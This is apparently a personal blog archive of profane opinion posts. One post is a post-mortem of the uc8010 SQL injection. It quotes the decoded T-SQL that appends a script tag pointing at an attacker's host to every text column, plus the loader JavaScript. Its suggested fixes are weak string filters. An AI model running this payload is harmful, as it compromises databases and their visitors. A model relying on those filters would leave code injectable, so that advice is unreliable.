100,000 diggs (and counting): most digged article ever!
Due to the lack of things to do at work (and the demise of FaceBook) I’ve been wasting more time on sites like Digg and LifeHacker et al.
Typically, I see a fun story and click it, read it and move on. The problem is, there are not that many fun stories out there, most of the stuff that is posted is utterly boring and cannot really be of genuine interest. These posts typically get 2000+ diggs, and upwards of 200 comments.
I want to write and tell the losers to stop commenting, to just stop writing mindless drivel (stop posting it would be even better), but I'd be cast as a troll. I just wonder who these people are that spend hours of their lives reading dumb posts, commenting on things which are utterly useless and pointless. It's not even funny, most of it. It's just:
“Wow”
“Amazing”
“Linux rules”
“Windows sucks”
“Fuck you asshole”
“Nazi“
You get the drift.
Hillary v Obama
Every so often, the fates conspire to bring us a contest from which will rise a champion whose influence will last decades, if not longer. David v Goliath! Kirk v the Klingons! Picard v the Borg! Janeway v the Borg! Luke v Vader, Luke v The Emperor. You get the drift.
The contest between Hillary and Obama, is not one of these.
Quite frankly, it is the most boring thing I've seen for a long bloody time. I thought Americans were stupid when they voted GWB in the first time. The second time, are you fucking kidding me?
Now this.
It’s the oldest trick in the book, divide and conquer; normally you get your opponents to do both bits, the division and the conquest; not this time. Obama (and Hillary) have done their utmost to split things right down the middle.
There is no way the Republicans can win this election.
If you'd asked me before the Primaries started, I would have said that any loyal Democrat would do whatever it took to win the next election. These two seem to be doing whatever they can to lose it.
What a damned shame.
uc8010(dot)com: the facts, more info and post mortem
I posted this when my website got hacked. Within hours thanks to several clever guys, the whole thing was completely deconstructed with hard facts and code. Thanks to all those that contributed their information, it really helped me and many others out there.
This post is a summary of the comments spawned by my original post. If I forgot something important let me know.
How it was done
SQL injection via unescaped querystring variables.
We think they probed several querystring variables (like id, by, filter, etc.) until one worked.
Here is the code they injected (taken from someone's logfiles, and slightly tidied):
2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
NVARCHAR(4000));
EXEC(@S);–178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;
202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248
The actual SQL injected, once decoded, looks like this:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a, syscolumns b
  where a.id=b.id
  and a.xtype='u'                                               -- user tables only
  and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)  -- ntext, text, nvarchar and varchar columns
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  -- append the script tag to every row of every matching column
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://?.uc8010.com/0.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
How to find out exactly how it happened to you
Try this at the command prompt on your logfiles:
find "0x4400450043" ex071228.log
find "0x4400450043" ex071229.log
find "0x4400450043" ex071230.log
How to fix
Make sure you escape your variables to protect against SQL injection.
In this case (MS SQL Server), you should do (something like) this:
string safer_id = Request.QueryString["id"].Replace("'", "''");
By the looks of it, 'CAST(' and 'EXEC(' look like good things to disallow too. More than likely you should restrict the length of the querystrings as well, so something like the below can't really hurt:
string safer = Request.QueryString["id"].Replace("'", "''");   // double up single quotes
if (safer.Length > 127)
    safer = safer.Substring(0, 127);                            // cap the length
safer = safer.Replace("CAST(", "NOCAST](");                     // break CAST(...)
safer = safer.Replace("EXEC(", "NOEXEC](");                     // break EXEC(...)
These are not foolproof, and you should use STORED PROCEDURES in future (I know it is much more work!).
What did it do?
Basically the code injected into your database found every varchar and text field and appended the string:
<script src=http://?.uc8010.com/0.js></script>
The code for 0.js looks like:
function setCookie(name, value)
{
    var Days = 1;
    var exp = new Date();
    exp.setTime(exp.getTime() + Days*30*60*1000);   // 30 minutes, despite the variable name
    //Days*24*60*60*1000;
    document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString();
}
function getCookie(name)
{
    var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
    if (arr != null)
    {
        return unescape(arr[2]);    // marker cookie present: do nothing this time
    }
    else
    {
        document.writeln("");
        document.writeln("");
        setCookie("Lin", "ok");     // set the marker so a repeat visitor is not served it again
        return null;
    }
}
getCookie("Lin");
It is malicious: the point
According to websmithrob, this code is malicious, and hidden in there is an attack known as EXPL_REALPLAY.H, or the RealPlayer Exploit (read more about it here).
uc8010 is an SQL injection attack
update on uc8010(dot)com: 07 January 2008
The exploit has been exposed and described (see the comments below; very, very informative). Below you can find out HOW they did it and WHAT it did. There is no magic fix, you will most likely have to restore your data from a backup, and to prevent further attacks you should escape all querystring variables coming into your database.
Thanks very much to the guys who posted their findings here! Much appreciated.
The attack *is* malicious, and the potential payload is described here: http://websmithrob.wordpress.com/ (or here: http://isc.sans.org/diary.html?date=2008-01-04).
Also watch out for ucmal.com (122.224.146.246), which appears to be up to similar tricks.
Original post
I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.
As far as I can tell, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.
For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.
When is a trojan not a trojan: asecurityservice.com
A non-technical friend of mine recently phoned me up to say he had been infected by a virus. His home page was hi-jacked and he was pretty worried. The infection was proudly proclaimed to be by asecurityservice.com. According to several sources [of dubious accuracy] this is very serious.
asecurityservice.com is dangerous toolbar and comes from very dangerous trojan zlob. It hijack your homepage and displays fake warning message to download the another fake spyware applications… If your computer is infected by asecurityservice.com.com hijacker then it is very dangerous for your computer.
Note how many times they say dangerous. Note how poor the English is. Note how childishly they warn you of the impending doom. Ooooh this must be bad. I want my {mommy | blanket | cigarettes | pillow} (delete as appropriate)
What are the symptoms?
User’s homepage is changed to asecurityservice.com.com or to other unfamiliar websites. Warning messages such as “Virus Alert”, “Your Computer is Infected”, “Security Alert” Trojan-Spy.win32@mx or Spyware.Cyberlog-X infections are displayed.
You even get a warning that something has happened.
The art of deception: dead?
Well, that's all very interesting, but if I were seriously writing a trojan, would I shout so loudly that I had invaded your machine? (I saw Troy, and I don't remember the Spartans (holding megaphones) riding the wooden horse into Troy, shouting YOUR DEFENSES HAVE BEEN BREACHED. In fact, why bother with the wooden horse in the first place?) Morons.
No. More likely this is what I think should be called “asshole-ware”. Why would someone announce that you were ill, could it be so that they could sell you medicine?
Your machine probably is infected, it may even be a real trojan, but the real catch is that they get you to pay $25 to remove the infection. It's a real, real dumb idea, but it probably works.
A real trojan is about stealth, it doesn’t announce that it is dangerous.
It’s extremely funny, because they warn you of:
Very High Risk - Extremely dangerous Spyware. asecurityservice.com Uses stealth installation, randomly named entries and has the capability to self update or Restore after incomplete removal. Very hard to remove manually. Removing by free software or Re-Name the Dll file of asecurityservice.com cannot decrease the Privacy Risk, because it uses stealth installation method.
I like anything which uses stealth and then warns me that it is using stealth. Is the art of deception truly dead? Was the Cold War all for nothing? Fuckwits.
We have a cure
You can use http://www.lavasoftusa.com to clean your machine. It's free. It's safe. It's well-known. This is a reputable product, and you can download it from http://www.downloads.com, a safe place to get stuff like this.
If you're gonna lie, make it big
Lies:
- http://answers.yahoo.com/question/index?qid=20070802173106AA3GHWD
- http://hubpages.com/hub/asecurityservice-com
The key thing to note is that the answer is always the same: a specific recommendation of some no-brand spyware tool. Surprising that they never suggest McAfee or Symantec etc.
Appendix of delusion
This site is probably linked to the idiot mastermind of this scam: http://www.pcontech.com/ where they list their other scams.
Latest Hijackers List (more lies):
Old Hijackers List (older lies):
utorrent 1.7.x banned or broken
I dunno what happened, but it seems to me that uTorrent 1.7.x is broken and is being banned by several trackers. There are several VERY long threads at http://forum.torrent.com/.
- TorrentsForAll.net Advises against utorrent 1.7+
- uTorrent banned on several trackers!
- 1.7.x slows down browsing on Windows XP
- My mini-crusade to get uTorrent 1.7.1 unbanned.
Even Wikipedia (http://en.wikipedia.org/wiki/%CE%9CTorrent) has an entry under the headline Major Bugs. For posterity, it currently reads as follows (I suspect this will get removed from the page very soon).
Major bugs
On July 21, 2007 µTorrent version 1.7.2 was released, which fixed two bugs that had caused earlier 1.7 versions to be banned on a variety of trackers. The bugs in question could cause wrong stats to be reported, both intentionally and unintentionally. The first bug was solved in version 1.7.1 and the second in 1.7.2[16]. Although rumors spread that these µTorrent versions also reported personal info to an unknown destination (possibly the RIAA or MPAA), this has not been proven.
The solution is pretty obvious: http://download.utorrent.com/1.6.1/utorrent.exe
There is a bigger issue here, and it concerns the survival of P2P: will our own paranoia about the MPAA / RIAA force P2P out of use? Are they spreading the rumors? If they are, it is certainly the best weapon they have against P2P. If it's just paranoia, well, that's pretty sad. uTorrent is one of the finest pieces of freeware ever, as essential as WinZip ever was. So let's not ruin a good thing.
beta: getting it right the first time (making it for dummies)
Once every 5 or 10 years an idea so simple, so elegant, so obvious comes along and *SMACKS* you in the kisser. We call these ideas good ones. What I really want to talk about has nothing to do with "getting it" or "making it". Are you for real? What the hell did you think I was gonna tell you? The answer, you dumb-ass, is blowin' in the wind. Bob D. wrote that like 40 years ago; he knew what you should know, but because you are so busy trying to make it, you forgot to think. Forgetting to think is probably the biggest problem around (the next biggest problem is witless assholes who think they have it all figured out).
Anyway, that’s *slightly* off topic.
The biggest question today is not what you, or your Daily Mail | Express neighbours think. They are irrelevant, the world is being re-shaped without their bullshit agenda. People are tired of lies, although their propensity to be lied to seems to rise with inflation.
Nirvana killed punk rock (by accident), does that make them evil? We destroyed our planet (by accident)? Does that make us evil? Or stupid? Does it matter?
Answers on a postcard.
Stop wasting your time, there’s nothing coming; only a fool would think someone could save you
Don't forget that of all the things that you are, you might best be judged by what you want to be (or do!). If I were a god, that's how I'd do it. It's the intent that matters really; ultimately the truth of what and who you are will surface. A wasted life would be one where it didn't.
Remember "It's the best years of your life they want to steal" (vide infra), so the quicker you listen to "the voices in your head" the better. The time is now; don't wait till you have the BMW, the house, the knowledge. How much can that stuff really mean to you anyway?
It's not about saving the planet, it's really about drowning out the other noises and voices which seek to steer you away from doing what it is you need to do.
The voices in your head are calling
Stop wasting your time, there’s nothing coming
Only a fool would think someone could save you
The men at the factory are old and cunning
You don’t owe nothing, so boy get runnin’
It's the best years of your life they want to steal
Clampdown, The Clash (only a fool wouldn't know that :)
Why nothing you do will ever make a difference
Who was the Time “Person of the Year” in 2006? You’ll never believe it, no, you wouldn’t believe it if I told you, it was you (this is for real, not a “joke”).
How quaint. "You control the Information Age. Welcome to your world." Who the fuck writes shit like this? Who the fuck believes it? Many do. Writing about holidays in the sun and polka dot bikinis.
No one cares about what you have to say.
You must have realised, after writing over 4,458 posts, and amassing 350 comments and 580,876 views, and 7.5 million page impressions, after building your pathetic “brand online“, you are #1 with a bullet in Technorati, you earn £0.53 a day from Google Adwords. What a success story you are.
You have a Page Rank of 4!
Well done, but guess what. Nothing you do ONLINE will ever make a difference. Turn it off; if you want to be noticed, go have a crap in the middle of the street, that works (you'd be about £0.53 a day worse off though).

More suckage from LOVEFiLM
Regular visitors (hi T and C) will know about the LOVEFiLM story, but just a little update on these ass-fucks.
Today I got a really chirpy email from LOVEFiLM trying to sell me more shit (I have, by now, of course cancelled my account). It’s unsolicited email as far as I’m concerned, surely, when I cancelled my account, they should have stopped sending me emails?
Anyway, I know these guys are complete fuck-wanks. So, okay, I’ll unsubscribe…. ah ha here it is:
To unsubscribe from further LOVEFiLM promotions and offers, please email us at desubscribe@lovefilm.com. You may also submit a written request via UK postal mail to: LOVEFiLM, Freepost NAT5978, London NW10 6BR. Upon receipt, unsubscriber requests will be processed within 10 business days.
No problemo, I’ll send them an email. Wait for it…..
The following recipient(s) could not be reached:
desubscribe@lovefilm.com on 30/05/2007 10:45
The e-mail account does not exist at the organization this message was sent to.
Check the e-mail address, or contact the recipient directly to find out the correct address.
These guys really, really, really are funny fuckers.

